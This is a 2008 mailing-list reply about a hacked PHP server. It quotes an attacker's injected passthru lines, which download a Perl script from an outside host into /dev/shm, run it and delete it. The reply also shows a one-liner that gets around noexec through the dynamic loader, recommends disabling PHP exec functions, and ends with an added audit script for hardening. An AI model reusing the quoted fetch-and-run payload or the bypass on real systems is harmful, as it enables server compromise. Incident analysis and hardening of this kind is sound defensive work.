
Re: ping22: can not kill this process



On Jan 3, 2008 6:18 PM, Mike Wang <comritesecurity@gmail.com> wrote:
> Hi folks
[snip]
> http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
>  passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt
>  > bb.txt;perl bb.txt;rm -f bb.txt*');
>  passthru('id');
> ?>
>
>  the /tmp was mounted as rw,noexec,nosuid, so it cannot run.

nope. See below.

>  but not the /dev/shm, so the hacked script downloaded to /dev/shm, and run
> from there.
>
>  what kind of applications are using /dev/shm? I googled around, seem not to find
> much information.
> right now I mount it as rw,noexec,nosuid.

A lot of stuff does. /dev/shm is recommended by LSB if I'm not
mistaken. I know a few apps that use this (including my own).

Well done tracking this script kiddie.

This is a very stupid hack.

By the way, noexec doesn't buy you anything here. perl bb.txt
should've worked no matter whether /tmp is exec or not. The way I see it
they both worked (/tmp and /dev/shm). And besides, noexec can't even
stop executables anyway. That's the stupidest of flags for mount:

$> /lib/ld-linux.so.2 /usr/bin/printf "%s\n" foo
foo

And don't even think of making /lib/ld-linux.so.2 non exec or
something else... Your system will just break in a million pieces ;-)

It's time to tell PHP (via php.ini) not to allow any of those
functions that allow executing stuff from the system (system,
passthru, whatever).

Also, you might want to consider using Virtual Servers (Linux VServer,
Xen, vmware, etc).

Hack me once, shame on you. Hack me any other time with the same
stupid attack vector, shame on me.

Good that you took time to report this.

-- 
----)(-----
Luis Mondesi
Maestro Debiano

----- START ENCRYPTED BLOCK (Triple-ROT13) ------
Gur Hohagh [Yvahk] qvfgevohgvba oevatf gur fcvevg bs Hohagh gb gur
fbsgjner jbeyq.
----- END ENCRYPTED BLOCK (Triple-ROT13) ------
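The two hardening steps discussed in this thread (noexec,nosuid on /tmp and /dev/shm, and php.ini disable_functions covering system/passthru and friends) can be checked with a small audit script. This is an added example, not code from the thread or from any of the posters; it parses the /proc/mounts format and a php.ini fragment, and the two sample inputs embedded below are constructed for the demonstration.

```shell
#!/bin/sh
# Added audit helper (not from the thread). Given the text of /proc/mounts and of
# php.ini, report whether /tmp and /dev/shm carry noexec,nosuid and whether
# disable_functions lists the shell-spawning PHP functions the mail recommends blocking.
# Both samples are constructed; pass real files as the two arguments to run live.

SAMPLE_MOUNTS='tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid 0 0'
SAMPLE_INI='; constructed php.ini fragment
disable_functions = system,passthru'

# Exit 0 if mount point $2 in the mounts text $1 carries mount option $3.
mount_has_opt() {
    printf '%s\n' "$1" | awk -v mp="$2" -v opt="$3" '
        $2 == mp { n = split($4, a, ","); for (i = 1; i <= n; i++) if (a[i] == opt) found = 1 }
        END { exit found ? 0 : 1 }'
}

# Print, one per line, the shell-spawning PHP functions NOT listed in
# disable_functions of the php.ini text $1 (empty output means all are disabled).
php_missing_disabled() {
    disabled=$(printf '%s\n' "$1" \
        | sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=[[:space:]]*//p' | tr -d ' ')
    for fn in system passthru exec shell_exec popen proc_open; do
        case ",$disabled," in
            *",$fn,"*) ;;
            *) printf '%s\n' "$fn" ;;
        esac
    done
}

audit() {
    mounts=$1; ini=$2
    for mp in /tmp /dev/shm; do
        for opt in noexec nosuid; do
            if mount_has_opt "$mounts" "$mp" "$opt"; then echo "$mp: $opt set"; else echo "$mp: $opt MISSING"; fi
        done
    done
    missing=$(php_missing_disabled "$ini")
    [ -z "$missing" ] && echo "php.ini: all shell-spawning functions disabled" \
        || echo "php.ini: still enabled: $(echo $missing | tr ' ' ',')"
}

if [ $# -eq 2 ]; then audit "$(cat "$1")" "$(cat "$2")"; else audit "$SAMPLE_MOUNTS" "$SAMPLE_INI"; fi
```

With the constructed samples the script reports /dev/shm as missing noexec and php.ini as still allowing exec, shell_exec, popen and proc_open, which is exactly the gap the original poster hit.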